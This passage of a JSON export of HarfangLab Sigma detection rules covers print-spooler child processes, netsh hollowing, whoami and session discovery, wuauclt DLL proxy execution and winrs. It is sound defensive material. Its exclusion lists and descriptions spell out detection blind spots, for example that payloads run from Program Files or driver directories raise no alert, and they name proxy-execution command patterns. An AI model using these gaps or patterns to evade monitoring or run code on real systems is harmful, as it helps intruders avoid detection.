exclusion_wscript.exe:\n CommandLine:\n - '?:\\Windows\\system32\\wscript.exe /B /E:VBS ?:\\Windows\\system32\\spool\\DRIVERS\\x64\\3\\ACFPDF.TXT *'\n - '?:\\Windows\\SysWOW64\\wscript.exe /B /E:VBS ?:\\Windows\\system32\\spool\\DRIVERS\\x64\\3\\ACFPDF.TXT *'\n\n exclusion_regsvr32:\n CommandLine:\n - '?:\\WINDOWS\\SysWOW64\\regsvr32.exe /s ?:\\WINDOWS\\SysWOW64\\PrintConfig.dll'\n - '?:\\WINDOWS\\system32\\regsvr32.exe /s ?:\\WINDOWS\\system32\\spool\\drivers\\\\*\\3\\PrintConfig.dll'\n - 'regsvr32.exe /s /c DriverAutomationLibrary.dll'\n - '*regsvr32* ?:\\WINDOWS\\system32\\\\*'\n - '?:\\Windows\\System32\\regsvr32.exe /s ?:\\WINDOWS\\SYSTEM32\\\\*'\n\n exclusion_rundll32:\n CommandLine:\n - 'rundll32.exe ?:\\Windows\\system32\\spool\\DRIVERS\\\\*\\3\\\\*.dll,StatusMonitorEntryPoint *'\n - '?:\\WINDOWS\\system32\\rundll32.exe ?:\\WINDOWS\\system32\\spool\\DRIVERS\\\\*\\3\\\\*.dll,VendorSetupEntryPoint *Canon*'\n - 'rundll32.exe ?:\\Windows\\system32\\spool\\DRIVERS\\\\*\\3\\\\*.dll,CnmDxPEntryPoint *Canon*'\n - 'RUNDLL32 PRINTUI.DLL,PrintUIEntry /Xs /n *'\n - 'rundll32.exe url.dll,FileProtocolHandler EWB:undefined:0000:PRINTTO:*'\n - 'rundll32.exe ?:\\WINDOWS\\SYSTEM32\\SPOOL\\DRIVERS\\\\*\\3\\ES4PCCFG.DLL,DseMonitorJobA *'\n - 'rundll32.exe ?:\\Program Files\\TechSmith\\SnagIt *\\\\*'\n - 'rundll32.exe ?:\\Program Files (x86)\\TechSmith\\SnagIt *\\\\*'\n\n exclusion_cmd:\n CommandLine:\n - '?:\\Windows\\system32\\cmd.exe /c *\\pdfconverter\\\\*'\n - '?:\\windows\\system32\\cmd.exe /c pnputil *'\n - '?:\\windows\\system32\\cmd.exe /c pnputil.exe /enum-devices'\n - '?:\\windows\\system32\\cmd.exe /c pnputil.exe /enum-devices *'\n - '?:\\Windows\\system32\\cmd.exe /c *\\pstopdf.cmd'\n # Canon (CNMCPA9.DLL, CNMN6PPM.DLL, ...)\n # bbb97189a4de7ea08f128e0b8c481a89c50e993d8462cf737d28a148fece505f\n - '?:\\Windows\\system32\\cmd.exe /c route ADD -p 169.254.0.0 MASK 255.255.0.0 *'\n - '?:\\Windows\\System32\\cmd.exe /c netsh interface set interface XPS Card Printer High 
Speed USB Connection *'\n - '?:\\Windows\\system32\\cmd.exe /c ?:\\Program Files\\\\*\\\\*.bat'\n - '?:\\Windows\\system32\\cmd.exe /c ?:\\Program Files (x86)\\\\*\\\\*.bat'\n\n exclusion_system_sign:\n Image:\n - '?:\\Windows\\System32\\\\*'\n - '?:\\Windows\\SysWOW64\\\\*'\n Signed: 'true'\n Signature:\n - 'Microsoft Windows Hardware Compatibility Publisher'\n - 'Lexmark International, Inc.'\n - 'CANON INC.'\n - 'Dell Inc.'\n - 'Dell Incorporated'\n - 'SEIKO EPSON Corporation'\n - 'Brother Industries, ltd.'\n\n exclusion_temp_sign:\n Image: '?:\\Windows\\Temp\\\\*'\n Signed: 'true'\n Signature: 'Samsung Electronics CO., LTD.'\n\n exclusion_system32:\n Image: '?:\\Windows\\System32\\\\*'\n OriginalFileName:\n - 'FollowMeClientPortUI.exe'\n - 'GN__coms.exe'\n - 'HP*SM.dll' # (HP1100SM.dll, HPM1210SM.dll)\n - 'PortPopup.EXE'\n - 'zlm_zx.dll'\n - 'zsm_frontier.exe'\n - 'zshp1020.exe'\n\n exclusion_net:\n Image: '?:\\Windows\\System32\\net.exe'\n CommandLine|startswith: 'net start '\n\n exclusion_netsh:\n Image: '?:\\Windows\\System32\\netsh.exe'\n CommandLine|startswith: 'netsh firewall add portopening '\n\n exclusion_monitorui:\n Image: '?:\\Windows\\SysWOW64\\\\*.exe'\n OriginalFileName: 'MonitorUI.exe'\n\n exclusion_PDFCreator:\n Image|endswith:\n - '\\PDFCreator.exe'\n - '\\PDFCreator-cli.exe'\n - '\\PrintJobSource.exe'\n - '\\PDFSpool.exe'\n OriginalFileName:\n - 'PDFCreator.exe'\n - 'PDFCreator_pdfforge.exe'\n - 'PDFCreator_pdfforge2.exe'\n - 'PDFCreator_pdfforgeDL.exe'\n - 'PDFCreator-cli.exe'\n - 'PrintJobSource.exe'\n - 'PDFSpool.exe'\n\n exclusion_cpwsave:\n # C:\\Program Files (x86)\\Acro Software\\CutePDF Writer\\CPWSave.exe\n # C:\\Program Files (x86)\\CutePDF Writer\\CPWSave.exe\n Image|endswith: '\\CPWSave.exe'\n OriginalFileName: 'CPWSave.EXE'\n\n exclusion_multix:\n Image|endswith: '\\multix.exe'\n OriginalFileName: 'multix.exe'\n\n exclusion_gswin:\n Image|endswith: '\\gswin32c.exe'\n CommandLine: '*\\gswin32c.exe *pdfwrite* -sOutputFile=*'\n\n 
exclusion_seagfull:\n CommandLine: 'regsvr32.exe /s /c ssdal.dll'\n CurrentDirectory: '?:\\WINDOWS\\system32\\'\n\n exclusion_brother:\n Company: 'Brother Industries, Ltd.'\n OriginalFileName: 'MonitorUI.exe'\n Signed: 'true'\n Signature: 'Microsoft Windows Hardware Compatibility Publisher'\n\n exclusion_dotnet:\n OriginalFileName: 'dw20.exe'\n Signed: 'true'\n Signature: 'Microsoft Corporation'\n\n exclusion_hp:\n CommandLine:\n - 'regsvr32 /s hpbpro.dll'\n - 'regsvr32 /s hpboid.dll'\n - 'regsvr32 /s hpboidps.dll'\n - 'regsvr32 /s hpbmiapi.dll'\n - 'regsvr32 /s hpbprops.dll'\n CurrentDirectory: '?:\\WINDOWS\\system32\\'\n\n exclusion_ixbus:\n Image|contains: '\\ixbus\\'\n OriginalFileName: 'Spouleur.exe'\n Company: 'SRCI'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e62cf952-25f7-4ad2-b66c-70d6cdb5371d",
"rule_name": "Suspicious Process Spawned by spoolsv.exe",
"rule_description": "Detects the execution of a suspicious process by the Windows Print Spooler binary.\nThis can be the result of the exploitation of the CVE-2022-38028 vulnerability that allows attackers to escalate privileges to SYSTEM.\nNote that the rule excludes, among others, any child process located under Program Files, Program Files (x86) or the print spooler driver directories, so a payload started from one of those locations will not raise an alert.\nIt is recommended to investigate the process spawned by spoolsv.exe and other suspicious activities on the machine before this action.\n",
"rule_creation_date": "2024-04-23",
"rule_modified_date": "2025-10-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1068"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e65d4b07-e7f5-4ae6-a8d3-074bba289339",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:35.296194Z",
"creation_date": "2026-03-23T11:45:35.296197Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.296205Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1055/"
],
"name": "t1055_sacrificial_process_netsh.yml",
"content": "title: Netsh.exe Sacrificial Process Spawned\nid: e65d4b07-e7f5-4ae6-a8d3-074bba289339\ndescription: |\n Detects the suspicious execution of the legitimate Windows binary netsh.exe, spawned without arguments and in an abnormal execution context.\n This can mean that the binary is being used as a sacrificial or hollowed process.\n Such processes are spawned and malicious code is immediately injected into them for nefarious purposes.\n Note that executions whose parent or grandparent process is located under Program Files or Program Files (x86) are excluded by this rule.\n It is recommended to investigate the parent process performing this action and the destination IP addresses contacted by the netsh.exe process to determine the legitimacy of this behavior.\nreferences:\n - https://attack.mitre.org/techniques/T1055/\ndate: 2024/05/13\nmodified: 2026/02/19\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.privilege_escalation\n - attack.t1055\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Netsh\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.ProcessTampering\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n CommandLine:\n - '?:\\WINDOWS\\SysWOW64\\netsh.exe'\n - '?:\\WINDOWS\\System32\\netsh.exe'\n\n exclusion_programfiles:\n - GrandparentImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n - ParentImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n\n exclusion_pritunl:\n ParentImage|endswith: '\\pritunl-service.exe'\n\n exclusion_powershell:\n ParentImage:\n - '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'\n - '?:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe'\n - '?:\\Program Files\\PowerShell\\7\\pwsh.exe'\n GrandparentImage:\n - '?:\\Windows\\explorer.exe'\n - '?:\\Windows\\System32\\cmd.exe'\n - '?:\\Windows\\System32\\RuntimeBroker.exe'\n\n exclusion_windowsterminal:\n Ancestors|startswith: '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|?:\\Program 
Files\\WindowsApps\\Microsoft.WindowsTerminal_*\\WindowsTerminal.exe|?:\\Windows\\explorer.exe|?:\\Windows\\System32\\userinit.exe|?:\\Windows\\System32\\winlogon.exe|'\n\n exclusion_sihost:\n ParentImage: '?:\\Windows\\System32\\sihost.exe'\n GrandparentImage: '?:\\Windows\\System32\\svchost.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e65d4b07-e7f5-4ae6-a8d3-074bba289339",
"rule_name": "Netsh.exe Sacrificial Process Spawned",
"rule_description": "Detects the suspicious execution of the legitimate Windows binary netsh.exe, spawned without arguments and in an abnormal execution context.\nThis can mean that the binary is being used as a sacrificial or hollowed process.\nSuch processes are spawned and malicious code is immediately injected into them for nefarious purposes.\nNote that executions whose parent or grandparent process is located under Program Files or Program Files (x86) are excluded by this rule.\nIt is recommended to investigate the parent process performing this action and the destination IP addresses contacted by the netsh.exe process to determine the legitimacy of this behavior.\n",
"rule_creation_date": "2024-05-13",
"rule_modified_date": "2026-02-19",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1055"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e68503f8-c396-45ae-a06e-ce317227090f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:35.295401Z",
"creation_date": "2026-03-23T11:45:35.295405Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.295412Z",
"rule_level": "low",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1033/"
],
"name": "t1033_whoami_macos.yml",
"content": "title: Current Username Discovered via Whoami (macOS)\nid: e68503f8-c396-45ae-a06e-ce317227090f\ndescription: |\n Detects the execution of the whoami command.\n Attackers may use it during the discovery phase of an attack to retrieve the current account username.\n It is recommended to investigate for malicious behavior by the process and correlate this alert with any other discovery activity.\nreferences:\n - https://attack.mitre.org/techniques/T1033/\ndate: 2022/11/14\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1033\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.Discovery\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n Image: '/usr/bin/whoami'\n ParentImage|contains: '?'\n\n exclusion_parentimage:\n ParentImage: '/Library/Application Support/TrendMicro/TmccMac/TMSMMonitor'\n\n exclusion_jamf:\n - ParentCommandLine|startswith: 'sh -c /usr/bin/whoami >& ?/Library/Application Support/JAMF/tmp/'\n - GrandparentImage: '/usr/local/jamf/bin/jamf'\n\n exclusion_zoom:\n ParentCommandLine: '/bin/bash /tmp/PKInstallSandbox.*/Scripts/us.zoom.pkg.videomeeting.*/postinstall /var/folders/*/us.zoom.ZoomDaemon.*/zoomTmp.pkg /Applications / /'\n\n exclusion_fxhome:\n ParentCommandLine: '/bin/bash /tmp/PKInstallSandbox.*/Scripts/com.fxhome.pkg.ArtlistBundle.ofxplugins.*/postinstall*'\n\n exclusion_warp:\n Ancestors: '/bin/zsh|/bin/zsh|/Applications/Warp.app/Contents/MacOS/stable|/Applications/Warp.app/Contents/MacOS/stable|/sbin/launchd'\n\n exclusion_wd_discovery:\n Ancestors|contains: '|/Applications/WD Discovery/WD Discovery.app/Contents/WDTrashObserver|'\n\n exclusion_fsecure:\n GrandparentImage: '/bin/bash /usr/local/f-secure/bin/fsupdated_guts2 --download'\n\n exclusion_globalprotect:\n ParentImage: '/Applications/GlobalProtect.app/Contents/Resources/PanGpHip'\n\n exclusion_homebrewshell:\n ParentImage:\n - '/opt/homebrew/Cellar/zsh/*/bin/zsh'\n - 
'/opt/homebrew/Cellar/fish/*/bin/fish'\n\n exclusion_withsecure:\n ParentImage: '/Library/WithSecure/bin/wsswupd.xpc/Contents/MacOS/wsswupd|/sbin/launchd'\n\n exclusion_wdthrash:\n GrandparentCommandLine: '/bin/bash -c pgrep -u \"$(whoami)\" -x WDTrashObserver'\n\n exclusion_trendmicro:\n ParentImage|startswith: '/Library/Application Support/TrendMicro/Tools/'\n\n exclusion_idea:\n GrandparentCommandLine: '/Applications/IntelliJ IDEA.app/Contents/MacOS/idea'\n\n condition: selection and not 1 of exclusion_*\nlevel: low\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e68503f8-c396-45ae-a06e-ce317227090f",
"rule_name": "Current Username Discovered via Whoami (macOS)",
"rule_description": "Detects the execution of the whoami command.\nAttackers may use it during the discovery phase of an attack to retrieve the current account username.\nIt is recommended to investigate for malicious behavior by the process and correlate this alert with any other discovery activity.\n",
"rule_creation_date": "2022-11-14",
"rule_modified_date": "2026-02-11",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1033"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e68bcbd8-7151-4ef4-8500-6fbf81efc0a0",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-24T07:14:08.657787Z",
"creation_date": "2026-03-23T11:45:34.605611Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.605619Z",
"rule_level": "medium",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://blog.bitsadmin.com/spying-on-users-using-rdp-shadowing",
"https://swarm.ptsecurity.com/remote-desktop-services-shadowing/",
"https://attack.mitre.org/techniques/T1018/"
],
"name": "t1018_rdp_session_discovery.yml",
"content": "title: Remote Session/User Information Listed\nid: e68bcbd8-7151-4ef4-8500-6fbf81efc0a0\ndescription: |\n Detects the execution of qwinsta or quser system binaries to list remote session information.\n Attackers may use these commands to discover users logged into a computer or to find sessions that can be hijacked.\n It is recommended to analyze the ancestors of the discovery command to look for malicious processes.\nreferences:\n - https://blog.bitsadmin.com/spying-on-users-using-rdp-shadowing\n - https://swarm.ptsecurity.com/remote-desktop-services-shadowing/\n - https://attack.mitre.org/techniques/T1018/\ndate: 2023/08/21\nmodified: 2026/03/23\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1018\n - attack.lateral_movement\n - attack.t1563.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Discovery\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_qwinsta:\n OriginalFileName: 'qwinsta.exe'\n CommandLine|contains: ' ?server'\n\n selection_quser:\n OriginalFileName: 'quser.exe'\n CommandLine|contains: ' ?server'\n\n selection_current_dir:\n CurrentDirectory|startswith:\n - '?:\\windows\\'\n - '?:\\ProgramData\\'\n - '?:\\PerfLogs\\'\n - '?:\\temp\\'\n - '?:\\users\\'\n - '?:\\Program Files (x86)\\'\n - '?:\\Program Files\\'\n - '?:\\\\?Recycle.Bin\\'\n\n # This is handled by the rule b0b2818b-2803-4a79-b1f2-7a0f323fc955\n filter_query_user:\n ParentCommandLine|contains: 'query user'\n\n exclusion_local:\n CommandLine|contains: 'quser.exe /server:localhost'\n\n exclusion_ninja_rmm:\n ParentCommandLine|contains: '?:\\ProgramData\\NinjaRMMAgent\\scripting\\customscript_gen_*.ps1'\n\n exclusion_citrix:\n Ancestors|startswith: '?:\\Windows\\System32\\query.exe|?:\\Windows\\System32\\cmd.exe|?:\\Program Files (x86)\\Citrix\\Workspace Environment Management Agent\\VUEMCmdAgent.exe|?:\\Program Files (x86)\\Citrix\\Workspace Environment Management 
Agent\\Citrix.Wem.Agent.Service.exe|'\n\n exclusion_prometeus_windows_exporter:\n ProcessGrandparentCommandLine: 'powershell -file ?:\\Program Files\\windows_exporter\\disconnected_user_prom.ps1'\n\n exclusion_bisf:\n ProcessGrandparentCommandLine:\n - 'Powershell.exe -WindowStyle Maximize -file ?:\\Program Files (x86)\\Base Image Script Framework (BIS-F)\\framework\\PrepBISF_Start.ps1'\n - 'Powershell.exe -WindowStyle Maximize -file ?:\\Program Files\\Base Image Script Framework (BIS-F)\\framework\\PrepBISF_Start.ps1'\n\n exclusion_fogservice:\n ProcessGrandparentImage:\n - '?:\\Program Files\\FOG\\FOGService.exe'\n - '?:\\Program Files (x86)\\FOG\\FOGService.exe'\n\n exclusion_generic_monitoring:\n ProcessGrandparentCommandLine:\n - '?:\\Windows\\System32\\cmd.exe /C ?:\\Script\\\\*.bat'\n - '?:\\Windows\\System32\\cmd.exe /C ?:\\Scripts\\\\*.bat'\n - '?:\\Windows\\system32\\cmd.exe /c \\\\\\\\*\\\\*$\\SCRIPT\\\\*.bat'\n - '?:\\Windows\\system32\\cmd.exe /c \\\\\\\\*\\\\*$\\SCRIPTS\\\\*.bat'\n - '?:\\WINDOWS\\system32\\cmd.exe /K \\\\\\\\*\\rdp$\\\\*.bat *'\n\n exclusion_zabbix:\n ParentCommandLine|contains: '?:\\Program Files\\Zabbix Agent 2\\zabbix-agent-scripts\\\\*.ps1'\n\n exclusion_template_gpscript:\n ProcessAncestors|contains: '?:\\Windows\\System32\\gpscript.exe|?:\\Windows\\System32\\svchost.exe'\n\n exclusion_schedule:\n - ProcessParentCommandLine:\n - '?:\\Windows\\System32\\taskeng.exe'\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p -s Schedule'\n - ProcessGrandparentCommandLine:\n - '?:\\Windows\\System32\\taskeng.exe'\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p -s Schedule'\n - ProcessGrandparentParentCommandLine:\n - '?:\\Windows\\System32\\taskeng.exe'\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p -s Schedule'\n - ProcessGrandparentGrandparentCommandLine:\n - '?:\\Windows\\System32\\taskeng.exe'\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p -s Schedule'\n\n # https://x.com/SBousseaden/status/1326652574150299649\n 
exclusion_runas:\n ProcessGrandparentCommandLine|contains: 'RunDll32.exe ?:\\Windows\\System32\\SHELL32.dll,RunAsNewUser_RunDLL Local\\{4ddb9f3f-700c-4bd6-9fc0-eaf85c01d25b}'\n\n condition: (selection_qwinsta or selection_quser) and selection_current_dir and not 1 of exclusion_* and not 1 of filter_*\nlevel: medium\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e68bcbd8-7151-4ef4-8500-6fbf81efc0a0",
"rule_name": "Remote Session/User Information Listed",
"rule_description": "Detects the execution of qwinsta or quser system binaries to list remote session information.\nAttackers may use these commands to discover users logged into a computer or to find sessions that can be hijacked.\nIt is recommended to analyze the ancestors of the discovery command to look for malicious processes.\n",
"rule_creation_date": "2023-08-21",
"rule_modified_date": "2026-03-23",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery",
"attack.lateral_movement"
],
"rule_technique_tags": [
"attack.t1018",
"attack.t1563.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e695e27c-1cfb-4fc6-beb2-d33a10512974",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.070680Z",
"creation_date": "2026-03-23T11:45:34.070682Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.070686Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://dtm.uk/wuauclt/",
"https://www.malwarebytes.com/blog/news/2022/01/north-koreas-lazarus-apt-leverages-windows-update-client-github-in-latest-campaign",
"https://lolbas-project.github.io/lolbas/Binaries/Wuauclt/",
"https://attack.mitre.org/techniques/T1218/"
],
"name": "t1218_suspicious_proxy_execution_wuauclt.yml",
"content": "title: Suspicious Proxy Execution via wuauclt.exe\nid: e695e27c-1cfb-4fc6-beb2-d33a10512974\ndescription: |\n Detects the use of Windows Update Client wuauclt.exe to gain code execution by specifying an arbitrary DLL.\n Attackers may abuse it to bypass security restrictions.\n It is recommended to analyze the process responsible for the execution of wuauclt.exe to determine if it is being used in a legitimate context and investigate the DLL provided in the command-line to determine its legitimacy.\nreferences:\n - https://dtm.uk/wuauclt/\n - https://www.malwarebytes.com/blog/news/2022/01/north-koreas-lazarus-apt-leverages-windows-update-client-github-in-latest-campaign\n - https://lolbas-project.github.io/lolbas/Binaries/Wuauclt/\n - https://attack.mitre.org/techniques/T1218/\ndate: 2022/01/25\nmodified: 2025/02/13\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218\n - attack.s0108\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Wuauclt\n - classification.Windows.Behavior.ProxyExecution\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_image:\n - Image|endswith: '\\wuauclt.exe'\n - OriginalFileName: 'wuauclt.exe'\n selection_command:\n # wuauclt.exe /UpdateDeploymentProvider /RunHandlerComServer\n CommandLine|contains|all:\n - '/UpdateDeploymentProvider'\n - '/RunHandlerComServer'\n\n exclusion_legitimate_parent:\n ParentCommandLine:\n - '?:\\Windows\\System32\\mousocoreworker.exe -Embedding'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s wuauserv'\n\n # exclusion_legitimate_parent must be correct but sometime parent information are not present\n exclusion_commandline:\n CommandLine|endswith :\n # C:\\Windows\\system32\\wuauclt.exe /UpdateDeploymentProvider UpdateDeploymentProvider.dll /ClassId ffeefba3-ab95-41c1-94fa-8b880256b9c7 
/RunHandlerComServer\n # \"C:\\Windows\\system32\\wuauclt.exe\" /UpdateDeploymentProvider UpdateDeploymentProvider.dll /ClassId f905a3e8-7300-4355-bc41-4af72965d2cf /RunHandlerComServer\n - ' /UpdateDeploymentProvider UpdateDeploymentProvider.dll /ClassId ????????-????-????-????-???????????? /RunHandlerComServer'\n # C:\\WINDOWS\\system32\\wuauclt.exe /UpdateDeploymentProvider wuaueng.dll /RunHandlerComServer\n # \"C:\\Windows\\system32\\wuauclt.exe\" /UpdateDeploymentProvider wuaueng.dll /RunHandlerComServer\n - ' /UpdateDeploymentProvider wuaueng.dll /RunHandlerComServer'\n\n exclusion_mousocoreworker:\n ParentImage: '?:\\Windows\\System32\\MoUsoCoreWorker.exe'\n GrandparentCommandLine: '?:\\windows\\system32\\svchost.exe -k DcomLaunch -p'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e695e27c-1cfb-4fc6-beb2-d33a10512974",
"rule_name": "Suspicious Proxy Execution via wuauclt.exe",
"rule_description": "Detects the use of Windows Update Client wuauclt.exe to gain code execution by specifying an arbitrary DLL.\nAttackers may abuse it to bypass security restrictions.\nIt is recommended to analyze the process responsible for the execution of wuauclt.exe to determine if it is being used in a legitimate context and investigate the DLL provided in the command-line to determine its legitimacy.\n",
"rule_creation_date": "2022-01-25",
"rule_modified_date": "2025-02-13",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1218"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e6b9469d-5088-46a6-a7f4-26d176eb8bde",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.627259Z",
"creation_date": "2026-03-23T11:45:34.627261Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.627265Z",
"rule_level": "medium",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/winrs",
"https://attack.mitre.org/techniques/T1218/",
"https://attack.mitre.org/techniques/T1021/006/"
],
"name": "t1218_winrs.yml",
"content": "title: Execution on Remote Host via Winrs\nid: e6b9469d-5088-46a6-a7f4-26d176eb8bde\ndescription: |\n Detects the execution of Winrs.exe to possibly execute malicious binaries on a remote host.\n This binary, which is digitally signed by Microsoft, is supposed to be used as a (remote) administrative tool.\n Attackers may abuse it to bypass security restrictions.\n It is recommended to investigate the parent process for suspicious activities as well as to look for subsequent malicious actions stemming from the Winrs process.\nreferences:\n - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/winrs\n - https://attack.mitre.org/techniques/T1218/\n - https://attack.mitre.org/techniques/T1021/006/\ndate: 2022/12/04\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218\n - attack.lateral_movement\n - attack.t1021.006\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.Lateralization\n - 